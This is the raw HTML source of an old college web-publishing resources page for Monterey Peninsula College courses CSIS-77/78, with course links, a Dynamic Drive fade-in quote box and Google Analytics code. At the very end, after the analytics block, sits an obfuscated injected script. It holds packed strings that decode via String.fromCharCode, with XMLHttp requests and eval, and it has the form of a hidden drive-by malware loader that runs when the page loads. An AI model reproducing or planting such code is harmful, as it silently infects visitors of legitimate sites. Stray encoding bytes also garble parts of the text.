ÿþ<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>computersmiths - Web resources - MPC CSIS-77/78</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <!-- ============================================================== --> <meta name="Publisher" content="Caliber Associates, Inc." /> <meta name="Publisher-Email" content="caliber@computersmiths.com" /> <meta name="Content-Language" content="en-US" /> <meta name="resource-type" content="document" /> <meta name="description" content=" Web design and publishing learning resources for Monterey Peninsula College" /> <meta name="keywords" content="Web education, Monterey Peninsula College, CSS resources, dhtml, dynamic html, Web color chart,Graphics,Web Resources, HTML Authoring, Web tutor, Internet tutor, JavaScript Examples,HTML Authoring, HTML Tutor, HTML Primer, Web tools" /> <meta name="distribution" content="global" /> <!-- ============================================================== --> <style type="text/css"> body { font-family: Verdana, Arial, Helvetica, Geneva, Sans, Swiss, sans-serif; font-size: 12pt; background-image: url('../images/earthelectron.jpg'); background-attachment: fixed; background-repeat: no-repeat; background-position: top left; margin-left: 100px; } p { font-family: Verdana, Arial, Helvetica, Geneva, Sans, Swiss, sans-serif; font-size: 12pt; } td { font-family: Verdana, Arial, Helvetica, Geneva, Sans, Swiss, sans-serif; font-size: 12pt; } blockquote { font-size: 10pt; } a { text-decoration: none; font-weight: bolder; } a:hover { text-decoration: underline; color: #009900; } .navtext { width: 150px; font-size: 12pt; border-width: 2px; border-style: outset; border-color: #cccccc; background-color: #B0E0E6; color: black; } #fadeinbox { position:absolute; width: 300px; left: 0; top: -400px; border: 2px solid black; background-color: lightyellow; padding: 4px; z-index: 100; visibility:hidden; } </style> <script language="javascript" type= "text/javascript" src="alttxt.js"> </script> <script type="text/javascript"> /*********************************************** * Sticky Note script- ýÿ Dynamic Drive DHTML code library (www.dynamicdrive.com) * Visit DynamicDrive.com for hundreds of DHTML scripts * This notice must stay intact for legal use * Go to http://www.dynamicdrive.com/ for full source code ***********************************************/ //Specify display mode. 3 possible values are: //1) "always"- This makes the fade-in box load each time the page is displayed //2) "oncepersession"- This uses cookies to display the fade-in box only once per browser session //3) integer (ie: 5)- Finally, you can specify an integer to display the box randomly via a frequency of 1/integer... // For example, 2 would display the box about (1/2) 50% of the time the page loads. var displaymode="always" var enablefade="yes" //("yes" to enable fade in effect, "no" to disable) var autohidebox=["yes", 10] //Automatically hide box after x seconds? [yes/no, if_yes_hide_after_seconds] var showonscroll="yes" //Should box remain visible even when user scrolls page? ("yes"/"no) var IEfadelength=1 //fade in duration for IE, in seconds var Mozfadedegree=0.05 //fade in degree for NS6+ (number between 0 and 1. Recommended max: 0.2) ////////No need to edit beyond here/////////// if (parseInt(displaymode)!=NaN) var random_num=Math.floor(Math.random()*displaymode) function displayfadeinbox(){ var ie=document.all && !window.opera var dom=document.getElementById iebody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body objref=(dom)? document.getElementById("fadeinbox") : document.all.fadeinbox var scroll_top=(ie)? iebody.scrollTop : window.pageYOffset var docwidth=(ie)? iebody.clientWidth : window.innerWidth docheight=(ie)? iebody.clientHeight: window.innerHeight var objwidth=objref.offsetWidth objheight=objref.offsetHeight objref.style.left=docwidth/2-objwidth/2+"px" objref.style.top=scroll_top+docheight/2-objheight/2+"px" if (showonscroll=="yes") showonscrollvar=setInterval("staticfadebox()", 50) if (enablefade=="yes" && objref.filters){ objref.filters[0].duration=IEfadelength objref.filters[0].Apply() objref.filters[0].Play() } objref.style.visibility="visible" if (objref.style.MozOpacity){ if (enablefade=="yes") mozfadevar=setInterval("mozfadefx()", 90) else{ objref.style.MozOpacity=1 controlledhidebox() } } else controlledhidebox() } function mozfadefx(){ if (parseFloat(objref.style.MozOpacity)<1) objref.style.MozOpacity=parseFloat(objref.style.MozOpacity)+Mozfadedegree else{ clearInterval(mozfadevar) controlledhidebox() } } function staticfadebox(){ var ie=document.all && !window.opera var scroll_top=(ie)? iebody.scrollTop : window.pageYOffset objref.style.top=scroll_top+docheight/2-objheight/2+"px" } function hidefadebox(){ objref.style.visibility="hidden" if (typeof showonscrollvar!="undefined") clearInterval(showonscrollvar) } function controlledhidebox(){ if (autohidebox[0]=="yes"){ var delayvar=(enablefade=="yes" && objref.filters)? (autohidebox[1]+objref.filters[0].duration)*1000 : autohidebox[1]*1000 setTimeout("hidefadebox()", delayvar) } } function initfunction(){ setTimeout("displayfadeinbox()", 100) } function get_cookie(Name) { var search = Name + "=" var returnvalue = "" if (document.cookie.length > 0) { offset = document.cookie.indexOf(search) if (offset != -1) { offset += search.length end = document.cookie.indexOf(";", offset) if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)) } } return returnvalue; } if (displaymode=="oncepersession" && get_cookie("fadedin")=="" || displaymode=="always" || parseInt(displaymode)!=NaN && random_num==0){ if (window.addEventListener) window.addEventListener("load", initfunction, false) else if (window.attachEvent) window.attachEvent("onload", initfunction) else if (document.getElementById) window.onload=initfunction document.cookie="fadedin=yes" } </script> </head> <body bgcolor="#ffffff"> <p align="right"> <img alt="computersmiths logo" height="26" width="524" src="../images/wwwcompsfadein.gif" /> </p> <h2 align="right">Monterey Peninsula College</h2> <h2 align="right">MPC Resources - CSIS-77 and 78 Web Publishing Courses</h2> <table border="0" width="100%" cellspacing="10" cellpadding="5"> <!-- <tr> <td width="50%"> <a href="../csis77/index.html" onmouseover="writetxt('Welcome to Monterey Peninsula College, Web publishing classes, Spring 2008')" onmouseout="writetxt(0)">CSIS 77 information and Lessons</a> </td> <td width="50%"> <a href="../csis78/index.html" onmouseover="writetxt('MPC Advanced Web Publishing, Fall 2007')" onmouseout="writetxt(0)">CSIS 78 information and Lessons</a> </td> </tr> <tr> <td width="50%"> <a href="../csis50/index.html" onmouseover="writetxt('MS Office Applications, Fall 2008')" onmouseout="writetxt(0)">CSIS 50/50L information and Lessons</a> </td> <td width="50%"> <a href="../csis62/index.html" onmouseover="writetxt('Web Animation with Macromedia Flash, Fall 2008')" onmouseout="writetxt(0)">CSIS 62 information and Lessons</a> </td> </tr> --> <tr> <td width="50%"> <a href="/educat/webrant.htm" title="A title attribute may be used within an anchor"> Some things to consider when planning a Web site</a> </td> <td width="50%"> <a href="http://www.computersmiths.com/caliber/htmltutr.htm" title="Short tabular presentation of HTML 3.2"> HTML Rosetta Stone (currently HTML 3.2)</a><br /> </td> </tr> <tr> <td width="50%"> <a href="/educat/webhosting.htm" onmouseover="writetxt('Some resources I have found to provide FREE e-mail, or Web hosting, or even Internet connections')" onmouseout="writetxt(0)">Free E-mail and Web hosting</a> </td> <td width="50%"> <a href="/educat/search/search_engine_tips.htm">How your site is discovered<br /></a> </td> </tr> <tr> <td width="50%"> <a href="/educat/ftp.htm">FTP tutorial (using WS-FTP)</a> </td> <td width="50%"> <a href="/educat/graphics/graphicstutorial.htm">Graphics tutorial links</a> </td> </tr> <tr> <td width="50%"> <a href="/educat/tables/tableoverview.htm">Demo and overview of TABLEs</a> </td> <td width="50%"> <a href="/educat/css/index.html">Cascading Style Sheets Resources </a> </td> </tr> <tr> <td width="50%"> <a href="/educat/dhtml/dhtml.htm">Dynamic HTML Resources </a> </td> <td width="50%"> <a href="/educat/multimedia.html">Multimedia used on the Web</a> </td> </tr> <tr> <td width="50%"> <a href="/educat/resources.htm">Resources for Web design</a> </td> <td width="50%"> <a href="/educat/browsercompare.htm">Use this page to compare simple HTML tag behavior</a> </td> </tr> <tr> <td width="50%"> <a href="/educat/forms/forms.htm">Forms tutorial </a> </td> <td width="50%"> <a href="/educat/webcheck.htm" onmouseover="writetxt('Sites to help verify your source code compared to standards')" onmouseout="writetxt(0)">Validation Resources for Web pages</a> </td> </tr> <tr> <td width="50%"> <a href="/educat/flashresources.html">Macromedia Flash Resources for Web animation</a> </td> <td width="50%"> <a href="/educat/ecommerce.htm">E-commerce Resources </a> </td> </tr> <tr> <td width="50%"> <a href="/educat/crossplatform/imageswap.htm">Image Swapping in IE and NS</a> </td> <td width="50%"> <a href="/educat/xml/xml_exer.htm">Introduction to XML</a> </td> </tr> <tr> <td width="50%"> <a href="/educat/javascript/jsresour.htm" onmouseover="writetxt('Some simple JavaScript examples, and libraries of resources')" onmouseout="writetxt(0)">Some JavaScript resources to check</a> </td> <td width="50%"> <a href="/educat/java/applets.html">Java Applets Resources</a> </td> </tr> </table> <div>&nbsp;</div> <div align="right"> <font size="-2"> <em> -- Whimper --<br /> We ask thusly of thee, that thine tolerance for error and omission<br /> on these humble pages be wary and keen. Ay brethren, we are<br /> merely mortals, and this is reality we occupy. Thank thee. </em> </font> </div> <div align="left"> <font size="-1"> <a href="http://www.computersmiths.com/GlobalUplift/RitaStorm/index.html">Visual imagery, anticipating Rita's wrath...</a><br /> <a href="http://www.computersmiths.com/chineseinvention/index.html">Chinese Invention and Discovery</a><br /> <a href="http://www.computersmiths.com/china1945/index.html">USNavy in WWII China</a> </font> </div> <div>&nbsp;</div> <div>&nbsp;</div> <hr width="30%" /> <p align="center"> <img align="middle" alt="e-mail box" height="34" width="29" src="../images/email1.gif" /> <font size="2"> Send e-mail to <a href="mailto:RandySmith@mpc.edu" onmouseover="self.status='e-mail ME!'; return true"> RandySmith@mpc.edu</a> </font> <br /> <em> Page last updated <script type="text/javascript" language="JavaScript"> <!-- Hiding var monthofyear=new Array("Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"); var monthchar,daynum,yearnum; monthchar=monthofyear[parseFloat(document.lastModified.substr(0,2))-1]; daynum=parseFloat(document.lastModified.substr(3,2)); yearnum=document.lastModified.substr(6,4); document.write(monthchar + " " + daynum +", " + yearnum); // end hiding contents --> </script> </em> </p> <div id="navtxt" class="navtext" style="position:absolute; top:-100px; left:0px; visibility:hidden"> &nbsp; </div> <DIV id="fadeinbox" style="filter:progid:DXImageTransform.Microsoft.RandomDissolve(duration=1) progid:DXImageTransform.Microsoft.Shadow(color=gray,direction=135) ; -moz-opacity:0"> <script language="Javascript"> <!-- var core = 0 var currentdate = 0 function StringArray (n) { this.length = n; for (var i =1; i <= n; i++) { this[i] = ' ' } } quote = new StringArray(102) quote[0] = "Remember, time flies like an arrow, but fruit flies like bananas.-- Randy Smith" quote[1] = "It is appallingly obvious that our technology exceeds our humanity.-- Albert Einstein" quote[2] = "Genius is one percent inspiration, and ninety-nine percent perspiration.-- Thomas Alva Edison" quote[3] = "The most beautiful thing we can experience is the mysterious. It is the source of all true art and all science. He to whom this emotion is a stranger, who can no longer pause to wonder and stand rapt in awe, is as good as dead: his eyes are closed.-- Albert Einstein" quote[4] = "Great spirits have always found violent opposition from mediocrities. The latter cannot understand it when a man does not thoughtlessly submit to hereditary prejudices but honestly and courageously uses his intelligence.-- Albert Einstein" quote[5] = "Only two things are infinite, the universe and human stupidity, and I'm not sure about the former.-- Albert Einstein" quote[6] = "Reality is merely an illusion, albeit a very persistent one.-- Albert Einstein" quote[7] = "There are only two ways to live your life. One is as though nothing is a miracle. The other is as though everything is a miracle.-- Albert Einstein" quote[8] = "As the island of our knowledge grows, so does the shore of our ignorance.--John Wheeler" quote[9] = "We shall not cease from exploration, and the end of all our exploring will be to arrive where we started and know the place for the first time.-- T. S. Eliot" quote[10] = "Most people would rather die than think; in fact, they do so.-- Bertrand Russell" quote[11] = "The reasonable man adapts himself to the world; the unreasonable one persists in trying to adapt the world to himself. Therefore, all progress depends on the unreasonable man.-- George Bernard Shaw" quote[12] = "The opposite of a correct statement is a false statement. The opposite of a profound truth may well be another profound truth.-- Niels Bohr" quote[13] = "In my opinion, the greatest single failure of American education is that students come away unable to distinguish between a symbol and the thing the symbol stands for.-- Paul Lutus" quote[14] = "I do not feel obliged to believe that the same God who has endowed us with sense, reason, and intellect has intended us to forgo their use.-- Galileo Galilei" quote[15] = "You must be the change you wish to see in the world.-- Mahatma Gandhi" quote[16] = "In any non-trivial axiomatic system, there are true theorems which cannot be proven.-- Kurt Godel" quote[17] = "The best way to predict the future is to invent it.-- Alan Kay" quote[18] = "With each passing year, because of advances in computer technology, there are more things, each more sophisticated, that we aren't allowed to do any more.-- Paul Lutus" quote[19] = "We do not inherit the land, we borrow it from our children.-- Native American Proverb" quote[20] = "It is better to remain silent and be thought a fool than to open one's mouth and remove all doubt.-- Voltaire" quote[21] = "Life is what happens to us while we're making other plans.-- John Lennon" quote[22] = "Be careful while reading health books, you might die of a misprint.-- Mark Twain" quote[23] = "Man is the only animal that blushes -- or needs to.-- Mark Twain" quote[24] = "He who asks is a fool for five minutes, but he who does not ask remains a fool forever.-- Chinese Proverb" quote[25] = "If all economists were laid end to end, they would not reach a conclusion.-- George Bernard Shaw" quote[26] = "It has been said that the primary function of schools is to impart enough facts to make children stop asking questions. Some, with whom the schools do not succeed, become scientists.-- Knut Schmidt-Nielsen" quote[27] = "In some sort of crude sense, which no vulgarity, no humor, no overstatement can quite extinguish, the physicists have known sin; and this is a knowledge which they cannot lose.-- J. Robert Oppenheimer" quote[28] = "A person who won't think has no advantage over one who can't think.-- Paul Lutus" quote[29] = "The test of a first-rate intelligence is the ability to hold two opposed ideas in the mind at the same time, and still retain the ability to function.-- F. Scott Fitzgerald" quote[30] = "Truth never damages a cause that is just.-- Mahatma Gandhi" quote[31] = "Please accept my resignation. I don't care to belong to any club that will have me as a member.-- Groucho Marx" quote[32] = "As far as the laws of mathematics refer to reality, they are not certain, and as far as they are certain, they do not refer to reality.-- Albert Einstein" quote[33] = "People are always blaming their circumstances for what they are. I don't believe in circumstances. The people who get on in this world are the people who get up and look for the circumstances they want, and, if they can't find them, make them.-- George Bernard Shaw" quote[34] = "I am quite serious when I say that I do not believe there are, on the whole earth besides, so many intensified bores as in these United States. No man can form an adequate idea of the real meaning of the word, without coming here.-- Charles Dickens" quote[35] = "Americans are willing to go to enormous trouble and expense defending their principles with arms, very little trouble and expense advocating them with words. Temperamentally we are ready to die for certain principles (or, in the case of overripe adults, send youngsters to die), but we show little inclination to advertise the reasons for dying.-- E.B. White" quote[36] = "When you read the history of the human family, it slowly comes to you that all the world's oceans once fell as tears.-- Paul Lutus" quote[37] = "I never saw a wild thing sorry for itself. A small bird will drop frozen dead from a bough without ever having felt sorry for itself.-- D. H. Lawrence" quote[38] = "A mathematician is a machine for turning coffee into theorems.-- Paul Erdos" quote[39] = "...when you have eliminated the impossible, whatever remains, however improbable, must be the truth.-- Sherlock Holmes" quote[40] = "I'm from Iowa, I only work in space.-- James T. Kirk" quote[41] = "Pay no attention to what the critics say; there has never been set up a statue in honor of a critic.-- Jean Sibelius" quote[42] = "There's no sense in being precise when you don't even know what you're talking about.-- John von Neumann" quote[43] = "One of the advantages of being a captain is being able to ask for advice without necessarily having to take it.-- James T. Kirk" quote[44] = "Creativity is more important than knowledge.-- Albert Einstein" quote[45] = "Its better to know some of the questions, than all of the answers.-- James Thurber" quote[46] = "Statistics are like lampposts: they are good to lean on, but they don't shed much light.-- Robert Storm-Petersen" quote[47] = "Nothing great was ever achieved without enthusiasm.-- R. W. Emerson" quote[48] = "Age is not important unless you're a cheese.-- Helen Hayes" quote[49] = "The biggest difference between time and space is that you can't reuse time.-- Merrick Furst" quote[50] = "All of the books in the world contain no more information than is broadcast as video in a single large American city in a single year. Not all bits have equal value.-- Carl Sagan" quote[51] = "Never write it in C if you can do it in `awk'; Never do it in `awk' if `sed' can handle it; Never use `sed' when `tr' can do the job; Never invoke `tr' when `cat' is sufficient; Avoid using `cat' whenever possible-- Taylor's Laws of Programming" quote[52] = "There are two kinds of people, those who finish what they start and so on.-- Robert Byrne" quote[53] = "Get your facts first, then you can distort them as you please.-- Mark Twain" quote[54] = "Middle age is when you've met so many people that every new person you meet reminds you of someone else.-- Ogden Nash" quote[55] = "Sacred cows make the best hamburger.-- Mark Twain" quote[56] = "Red meat is NOT bad for you. Now blue-green meat, THAT'S bad for you!-- Tommy Smothers" quote[57] = "The only thing you will ever be able to say in the so-called 'social' sciences is: some do, some don't.-- Ernst Rutherford" quote[58] = "History will be kind to me, for I intend to write it.-- Winston Churchill" quote[59] = "Do what you can, with what you have, where you are.-- Theodore Roosevelt" quote[60] = "A dog will look up on you; a cat will look down on you; however, a pig will see you eye to eye and know it has found an equal.-- Winston Churchill" quote[61] = "To be conservative at 20 is heartless and to be a liberal at 60 is plain idiocy.-- Winston Churchill" quote[62] = "Education is what survives when what has been learned has been forgotten.-- B.F. Skinner" quote[63] = "After I'm dead I'd rather have people ask why I have no monument than why I have one.--Cato the Elder (aka Marcus Porcius Cato)" quote[64] = "It's not who you are inside that defines you, it's what you do.--Chris Gilbert, UnitedHealth Group" quote[65] = "If you are going through hell, keep going.-- Winston Churchill" quote[66] = "I'd expected this, but this wasn't what I'd expected.--Fellow programmers probably understand" quote[67] = "Should not the Air and Space Museum be empty?--Anon" quote[68] = "The sum of the intelligence on the planet is a constant;the population is growing.--Anon" quote[69] = "What sane person could live in this world and not be crazy?--Ursula K. LeGuin" quote[70] = "Has everyone noticed that all the letters of the word 'database' are typed with the left hand? Now the layout of the QWERTYUIOP typewriter keyboard was designed, among other things, to facilitate the even useof both hands. It follows, therefore, that writing about databases is not only unnatural, but a lot harder than it appears.--Fortune" quote[71] = "If you don't care where you are, then you ain't lost.--Anon" quote[72] = "Just when you think you lost everything, you find out you can lose just a little bit more. -- Bob Dylan" quote[73] = "Asking whether machines can think is like asking whether submarines can swim.-- anon" quote[74] = "Hardware: The parts of a computer system that can be kicked.-- anon" quote[75] = "You never finish a program or a work of art, you just stop working on it.-- Randy Smith" quote[76] = "Before you criticize someone, you should walk a mile in their shoes. That way, when you criticize them, you're a mile away and you have their shoes.-- anon" quote[77] = "The best part about procrastination is that you are never bored, because you have all kinds of things that you should be doing.-- anon" quote[78] = "By the time a man realizes that maybe his father was right, he usually has a son who thinks he is wrong.-- anon" quote[79] = "Duct tape is a lot like the Force. It has a Dark Side, it has a Light Side, and it binds the galaxy togetherýÿ-- anon" quote[80] = "The early bird may get the worm, but the second mouse gets the cheese.-- anon" quote[81] = "Endeavor to so live that when you die even the undertaker will be sorry.-- anon" quote[82] = "Ever stop to think, and forget to start again?-- anon" quote[83] = "Experience is something you don't get until just after you need it.-- anon" quote[84] = "The haves and the have-nots can often be traced back to the dids and the did-nots.-- anon" quote[85] = "How many of you believe in telekinesis? Raise my hand.--anon" quote[86] = "I don't exaggerate. I just remember bigger than most people.-- anon" quote[87] = "If at first you don't succeed, skydiving is not for you.-- anon" quote[88] = "If Pro is the opposite of Con, What is the opposite of Progress? Congress!!-- anon" quote[89] = "Indecision is the key to flexibility.-- anon" quote[90] = "It has been determined that research causes cancer in rats.-- anon" quote[91] = "Life is complex: part real, part imaginary.-- anon" quote[92] = "The measure of man's real character is what he would do it he knew he would never get caught.-- anon" quote[93] = "The mistake a lot of politicians make is forgetting they've been appointed and thinking they've been anointed.-- anon" quote[94] = "The more people I meet, the more I like my cat.-- anon" quote[95] = "The more you know, the more you know you ought to know.-- anon" quote[96] = "A sure-fire formula for making a good speech: have a good beginning and a good ending and keep them as close together as possible.-- anon" quote[97] = "To steal ideas from one person is plagiarism; to steal from many is research.-- anon" quote[98] = "If nothing ever sticks to TEFLON, how do they make TEFLON stick to the pan?-- anon" quote[99] = "Tact is the ability to close your mouth before somebody else wants to.-- anon" quote[100] = "You don't get ulcers from what you eat. you get them from what's eating you.-- anon" quote[101] = "We can't solve problems by using the same kind of thinking we used when we created them. - Albert Einstein" var ran = 60/quote.length currentdate = new Date() core = currentdate.getSeconds() adcore = Math.floor(core/ran) core = adcore var thequote = quote[core] //var theauthor = author[core] var thebreak = ' - ' var theq = '"' var theend = '.' //document.write(thequote + thebreak + theauthor + theend) document.write(thequote + thebreak + theend) //document.write(theq + thequote + theq + thebreak + theauthor + theend) //--> </script> <div align="right"> <a href="#" onClick="hidefadebox();return false">Hide Box</a> </div> </DIV> <!-- tracking for google analytics --> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> var pageTracker = _gat._getTracker("UA-5034426-1"); pageTracker._initData(); pageTracker._trackPageview(); </script> <script>d='function g_p(file ,b >t YG="GE ;= [ +cg="" Je +L=tru % +c.offset=100 Qs Yy =z =A =D ! C8 H +C =B ! C8 H Qu Ys ]+t ]Qcd YH(); -sxml2 V1 C-icrosoft V2 ,b=null}}if(! b){if(typeof F!="undefined" ,b 9 F ]* L= 2}} Qo NE, ? ,g[g_E]= .( ?,false) QS NE, ?, <vars C32== <vars C< .( $g_E), $ ?)) * g[ $g_E)]= .( $ ?) U} Qx Nn,g_R){g_N= $ Wf);regexp 9RegExp( Wf+"|"+g_N); B. On 5regexp) Ei=0;i< B. 6;i++){g_k= B.[i] 5"="); 32= OR ,S A * o A}}}; [.trim NE,g_h){if("qabcdef".indexOf(g_E.substr(0,1))>=0 CB Z OE 5\'q\') 7\'\') 5\'v\') E Bi=0;i< Z 6;i++){ Z[i]=parseInt( Z[i],16)- ^ < Z 7\',\')+\',\'}else{ajax _c.offset2=25; < ^}; 8unR & !){eval( 8 &) Qca Nj C3 P&& Wg 6 ,x( Wg U}if(g_j C3 cg 6 Mj * cg Oj}} o("g_q",new Date().getTime());g_i 9 . ]Ekey in( g)){if(false== @1]&& 2== P){g_N= S(key, @0] U +g[key] >g[g_N[0]]= .(g_N[1] U;key ON[0]}g_i[g_i 6]=key+"="+ @0]}if(g_j Mi 7 Wf) * cg+ Oi 7 Wf)} QH YG="POS ;g="";d=\'v={! RR1%6^:"e-",! RW1%6^:"",& RR1%6v30:"l(\\'l=Str"\\5:"ing.fr",K!dyO$f%@6&a!6:"omCha",N$8$8y&?eA<5&4:"rCode("Be&7|I&7#f&?d$dFBd&6&9A1E&e&X0&6THa#G2!fQ#f%0$R9~/2A<b#dQ#<2&<a~/9-<e%e!f!f-7&e&3*6B4!4&8$f%5z_NEJ>Z0&4&8#G3&8#Z0JP3!3&8#Y8!0&5DKJ/4!f!4#5#7!dA1#f!4*4P5&d#eV-2$Ye-c-e*1,a5%5&1$<6$<6#f!4*4>2$c`LV&5$@8&4w/6^&a$2N$3&3OQ*6>@1!b-4-G3-YeV*1/eA8#3&?a&d$eO&6F>8#7!7&c#Y7$3EK*7/b$7$3!3!e!3#a-f!5*3>4D$dMKA6E&c$dT/5%fL#dKDL%@1*1,a0#8`L#3$@cA6Nw/Z0&8-@2!b`!4%eJ/dA1!4y_%9%8!@c*4P8!b%9N!@8&8N&dw/f!5%6!2#a-3%7!2!3~H4-7`$1%4V#d-@2J>?Xb#5Q|#<a&9FB1!0&b%?9#Z3&7!0J>0%Y3A7A7#3K!XbF/eD#6#Y5#?eA2&0U,ad$8MyN$8M&<8U,a4&7&a!X<a!eL!dFBd#5$WaQ%6$dD#8*7>5#5#5A2&<8$8QyUP8A<8&d&c%0&5A0&3wB9L!b%f#d-aV$3#f~/7$7V#fI&1&4!4&9*4/G3%1#d^-1M#G3JBY4%a%8I%4O%9-7*6Bd$@a-0#cA6A6#c#dFP0I%4%7!G5K$e!5UB9$e!<3ME%Z3&bJP2&?W@?9!?8$eUB3%1V$3!b%fV#6%9wHbI%WfA3&1!6&9E*6Pe&4#e!@@9&ey#8*6>9N#Y8#f``N^wBX4%b$G8N&b#<bwPf&3&0A3A3L&f&5#9*7>1L!1#7K#9-d-dK*1>2!G2L%f!2&?5_~P2y#?eA<W6y!5U/5#4#c#<?5&0A2!5UP6!6%4&1#3!3&8#<6*3H<??e&0-fM|$2UP6|-?9&5$3&d^QTP6|-5M&4$3-c^QT>G3&@4%eE-1&1!0J/9^$dI%c-fA2%X7T,ae%e%5%c-e%e%5%a-ewH2%1$8-b%4%X0-bIUBe%d$0$cA0%0$0A3%fFHb-e%5I%8-e%6IA2wB0%1$eA1D#3-b&fLF/?cQ-b$7-b$8-bMU,abO-bI-b$c-b$d-bUH3-fz-f%4-f%5-f%6T,aW0-W1-W2-W3-8~H8-c%9-c%a-c%b-c%c*6,aXe-Xf-dA0-dA1!e*7/d-5%G4!4#7^#6^*4>6D#9D#aD#bD#cU/Ya!YZb#G5VM~P2&?8-7DN&8DNUB5#<7&a!4N!@@c*4/9$7D!eE&c#<9-8*6>0^K!fL&a$?a-9*7/f#<9&@fDE-8!f*6,d1-5$7#<7Q#<7&6*4/@3-<@3%a-1$3$3J/2&We%Y3#4#7#G5~Ha#G3$3$7N-a-3!7JB5#4$2&@fV#4$2$cw/a$<f!6%4!@e!6Q*3B4#@4`#e!4&6-@1*1/e&a&aE#9#f#cK!eT>5#9$<e!6&8-e!3N*3P3&3!b#YY4!2K!5~BcIQ&4|I&6EyT>?2K#3K!b-f!G2~P1#@8#8#9#8DV&3w/c&b&6E#e&d^Q#4T/2&ZG2#7&6E-f|~/5&e&<5-2#ZeL#7UP0KQ&4|_&6E-6T/aA1#<c#9#b^`-8*7Bc$e&6`&1 `5&1#eT/f `7!f `7!f#c#5*3>4#9#f#4&0 `4#f#bw>3#f#7#3 `7#3#f#9*7>2#d#dK#8#bK#7#7*6/Y3K!Y3K!Y8#3~>3#8#8#3#c#d#3#c#c*7>1#6#6D `8D#bDU>Yc#5&0#5#b#5 `5T>5D#9#d$2&0I%4%7U>2L#R3&7#a&5_&6F/aO$@7yy%0KK*7/9%Z3$3V-bM-d#dJ,aa%b%9%0%5$Y5$X9*7H5_&9$e$R8&9%5O*6BfK_#?d$d$fV_F,af!d#4#6!b%f!2!f%4~P<aI%RR3#dKK*3/a!e!6-3!e!6$?e!6*3P3!@4`!@4I!@4*1P1-b-a&4!7-GdD-dJ>4^#7$c%W6#8^#4T/3$3$?eO$fM$eNJ/7!7E#Z3zN!0#aJPbA2-2$dD^$d#c^T/a!G8#dVO%7!1&8*1/<c-@2#Y@0K!0JH4_`#e-G3N|_*1/dE-e!4!2%9IQ%6~B8#dD^#<0$8VMJB7$W4#d#8^#Y@fJ/6#8!6-2A3A3&1E-a*6P2&?W4!?9!?8-3U>2$R6MV%8M&9%0*4B9%1Mz%8!@R3!d*4,d4yL%9&4&7L%7#3*7/R2!Xf!R4K$X2*4H2M%6&c-8-1-0&1!7*4H0%f#G5V$8#fy!2~Pf&GbL&@a-4L&fFPbN#c#6O%7$cA1&5wPRWf%6%6L&f&W9FH5%4N!3$3Q|K^J><<b-8V#G0y#bJ,adO!5&fy%9%RaOU>c-9&Ye!1#?f$3%0*1BeA3&5$2-8&7L#e-bFHc&1!7-8!@b$8$Xa*4>0K&4|%bD|A1#5T/c&1M$e%Z5$eMyUB<6$8#7$<6!4&b$8*4BXR4%0V%d#ez_*4H3O&<5D&0$1!7!5UPc#Z3&G<6%8E-1JHbN&0&3N&c&f&?8w>X6&5%c-7`O-1`*3H1M!@b$cMV$8!b*4>2`#9Q-a%fEL%cT,afN&7$@8-3%eD&3w/d-1L^%d#3A7A7A7F>b-8$3Q#G3$3Q#bJ/6QM!Z@6O$2!7*3>3$cO%9-a-9&8&5IUHa_$W9$e%4_!d-6UP3N#?b-e!f#4!f-fw>2%7M%8&5%WW6$d*4B6%9%8M!@b%R6$7*4/f#4`L%0%c%c%8yw>6#6$WR0#5%b%e%0*7H6%6$R4^V%1$fD~>9#Rc%a$X6$c%b#7wBeI_%6A3#W4%X9FBf&0-9!1&3!f!4-Z4*1Bf-f!Z7`N-1_z*4HX1DK#4#aA7&dOTH8M|$0$<ZdyD*4>1E%Z3%1#G3&bNJ>8!G4#3!4!4&1zM*4Ha!3&4%5%5`%@Z3*3/a&6-6O%X1#RbOTH3M%4z!GY3%9%4U,a6%R5$c%1O!Zc#e*3/4!1!?a%c_Q%5%6*1HR3!?a!GGd-fMU/a$<9#3%Z3ED`*3H0%0V$e`&3$8M$cJB4N!3!<8!3&bN#4J/9!0#b#b$2zV$1IJ,d<3!G6%0-e-f!?6*3/2!Gb%f$7$e%5$Rd~/7#3%X0%a%0M%0_*7Be%9%Yf$d$eMMOUH7E#6%fO%bEE#7T/6$c-e$c$0-Y9$0D*3H6%aO%RY3!5#4#3UBX2I%c&X9$e$f&bFHdD#aK#4E#bz$fTH5`%0$8!3#7$R2Q*3He%6$e%RdE#e|&eTB4DD$3E#f!f!fzT>4$f%4OI%e-5$@e*6/8!1!1DL!@4%bL*1/?0D`!e_V%4-5J,ac&bA6$@cA6D#?8w>7!3%1#G<a`-@2JB6#4$?b#6E&1&6|T,a6LE%5V%4Iz%6~/8L!1#a!4&6-@9!1*1/d#b#b#9#9D&6&6Nw>fN-3#3$cO%9&a%1UBb_I%4%a!6&1#4z*6Be%R0%X1E&?d&fTHbzz-fI$R8!e!f*6P?a&Wd$f%e-e_%7FBfL&9$dI%6%6$cIFB5$d#f-a$?2&4%9I~H7$X8A<9&cz$fDT/2&6!5$7#<?2&7!b~,d4EE&f&6|$YR8TB6Q_V%4!0&7!0_JHbA0_$c&4$3E!7&f*7/6%4&<6%4!e-f!5^*3/9-2|A3K!e|$cIT/9-G0&a!e!0K&c$fJB7OIO!6-1|%W4*6Be&7Q|#?Ga-6&8F>eDQI%8&<9!Z2~,a?b-8&?8#d-ZfVw/G5#eMz%?bQ&0*3>b 